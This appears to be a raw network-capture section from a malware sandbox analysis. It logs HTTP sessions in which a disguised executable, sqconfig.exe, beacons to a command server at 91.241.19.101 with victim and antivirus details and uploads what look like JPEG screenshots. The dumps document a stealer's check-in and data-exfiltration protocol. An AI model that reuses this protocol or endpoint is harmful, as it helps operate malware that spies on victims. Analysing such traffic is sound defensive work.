                                                                  Sep 30, 2021 23:54:17.308490992 CEST21576OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:17.519692898 CEST21589INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:17 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  255192.168.2.35009191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:17.438117981 CEST21576OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86295
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:54:17.438252926 CEST21576OUTData Raw: 2d 2d 2d 2d 2d 2d 62 64 63 30 64 66 31 37 33 38 64 32 31 61 65 33 34 33 66 35 62 31 32 38 38 31 35 30 33 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------bdc0df1738d21ae343f5b12881503e0eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:54:17.438442945 CEST21586OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:54:17.438566923 CEST21589OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:54:17.576571941 CEST21595OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:54:17.576608896 CEST21597OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:54:17.576780081 CEST21609OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:54:17.576900005 CEST21615OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:54:17.714117050 CEST21620OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:54:17.714183092 CEST21631OUTData Raw: ef fb 90 fd 57 e6 79 ab 7c 06 d3 36 9d ba 80 2d 8e 01 85 c0 ff 00 d1 95 e5 1e 34 f0 4d ff 00 84 b5 16 8e 54 26 03 ca ba e4 8c 7a 83 dc 7f 93 5f 57 59 5d 25 f5 85 bd dc 60 84 9e 25 95 41 ea 03 00 7f ad 67 78 97 c3 f6 be 23 d2 25 b3 b8 45 2f 82 62
                                                                  Data Ascii: Wy|6-4MT&z_WY]%`%Agx#%E/br>c2=6nx*Kb$S[Gg\CjA ~H!QN*K*5eJ[h:g4U>6Z]3NVts0h,;qqY}h}i
                                                                  Sep 30, 2021 23:54:17.714226007 CEST21641OUTData Raw: 15 bf e2 75 ce a0 bf ee 0a c6 58 ce 2b 97 0a ff 00 75 11 e3 22 dd 66 43 8e 69 c0 73 de a6 11 7b 54 8b 03 1e 8a 6b 67 34 8c 15 29 3e 85 60 b4 e0 86 ae a5 94 ad d1 1b f2 ab 09 a5 5c 3f fc b3 6a cd d6 8a dd 9b 47 0f 37 d0 cc 09 52 04 f6 ad 75 d1 67
                                                                  Data Ascii: uX+u"fCis{Tkg4)>`\?jG7Rug WHUY2/Y<LVf(OjxLViSYK}*}LA-33RZu&/6=j&<W_Ua4T'__k){:~l7pL2c
                                                                  Sep 30, 2021 23:54:17.924537897 CEST21663INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:17 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  26192.168.2.34978691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:57.426271915 CEST8042OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:52:57.618494034 CEST8112INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:57 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  27192.168.2.34978891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:57.870568037 CEST8114OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:52:58.065104008 CEST8124INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:57 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  28192.168.2.34979091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:58.094280958 CEST8124OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----c9932e640ba65e6431bee773009921f9
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 92984
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:52:58.094388962 CEST8125OUTData Raw: 2d 2d 2d 2d 2d 2d 63 39 39 33 32 65 36 34 30 62 61 36 35 65 36 34 33 31 62 65 65 37 37 33 30 30 39 39 32 31 66 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------c9932e640ba65e6431bee773009921f9Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:52:58.101567984 CEST8135OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:52:58.101721048 CEST8137OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:52:58.237910032 CEST8144OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:52:58.237970114 CEST8147OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:52:58.238156080 CEST8157OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:52:58.238185883 CEST8159OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:52:58.238209009 CEST8164OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:52:58.378057003 CEST8176OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:52:58.378098011 CEST8179OUTData Raw: 18 9e 1f 3a 0f ed 1d 3d f5 28 22 32 cb a7 23 b9 9d 00 19 61 9d 9e 59 65 19 25 43 92 30 46 32 08 ac 40 72 b9 15 d8 58 7f 63 cb e2 bb bd 7e cb 5d b4 13 4a 67 ba b6 b0 b9 dd 04 a6 57 07 f7 6f 23 81 0a 80 58 fc db ce 40 e0 64 e0 73 b0 da 68 ea 63 8e
                                                                  Data Ascii: :=("2#aYe%C0F2@rXc~]JgWo#X@dshcMyWWah8>q8g%k)n\S`JS{E%(bQIA (`:6`QKHAKJZ`- 1EAE-RRQEZNQ@Mh$Z(SE-%
                                                                  Sep 30, 2021 23:52:58.743074894 CEST8302INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:58 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  29192.168.2.34979191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:58.316092014 CEST8173OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:52:58.515372038 CEST8254INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:58 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  3192.168.2.34976291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:49.789021015 CEST7072OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:52:50.018070936 CEST7098INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:49 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  30192.168.2.34979391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:58.760878086 CEST8302OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:52:58.983227968 CEST8309INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:58 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0
                                                                  Sep 30, 2021 23:52:58.995564938 CEST8309OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----59b874e05f47d8f295c63e0ed2578125
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 95478
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:52:58.995811939 CEST8309OUTData Raw: 2d 2d 2d 2d 2d 2d 35 39 62 38 37 34 65 30 35 66 34 37 64 38 66 32 39 35 63 36 33 65 30 65 64 32 35 37 38 31 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------59b874e05f47d8f295c63e0ed2578125Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:52:58.996167898 CEST8319OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:52:58.996515989 CEST8322OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:52:59.119580984 CEST8326OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:52:59.119731903 CEST8339OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:52:59.119823933 CEST8342OUTData Raw: 17 c7 1a a2 6b d7 6a 8a 00 55 52 00 00 76 1c 52 ff 00 c2 c6 f1 8f fd 0c 17 bf f7 d0 ff 00 0a e4 85 1a b0 77 8c ac fd 59 d5 3a b4 a6 ad 25 74 7d 29 a6 f8 5b 44 d2 26 f3 ac b4 e8 a3 94 74 76 25 d8 7d 0b 12 47 e1 56 b5 af f9 00 ea 3f f5 eb 2f fe 80
                                                                  Data Ascii: kjURvRwY:%t})[D&tv%}GV?/kX1Sdchefz1DwUh#4Q]((|$u^]+0%g8kxGZkBIoeiR &3_jZey8nTl\O\
                                                                  Sep 30, 2021 23:52:59.120001078 CEST8345OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:52:59.120152950 CEST8350OUTData Raw: c7 87 18 ff 00 d3 33 5e 2f 7e df be 73 fe d1 af 3b 28 5e f4 cf 7b 39 77 f6 7e 87 a1 59 71 f0 ee 0f a8 fe 75 cc c9 5d 25 a1 c7 c3 bb 6f 73 fd 6b 97 95 c8 27 da b4 c2 2f 7a 7e ac e4 cc dd 94 3d 11 13 92 0f 06 90 4b 20 e8 e4 7e 34 84 e6 9b 5e 8d 91
                                                                  Data Ascii: 3^/~s;(^{9w~Yqu]%osk'/z~=K ~4^;NrgOXoE.Hu,i'AMkI>bq+[2wqVE~5lCT<GsMu5XO-&<Jii-iD'kg/TF5W+9+zO7:&r#
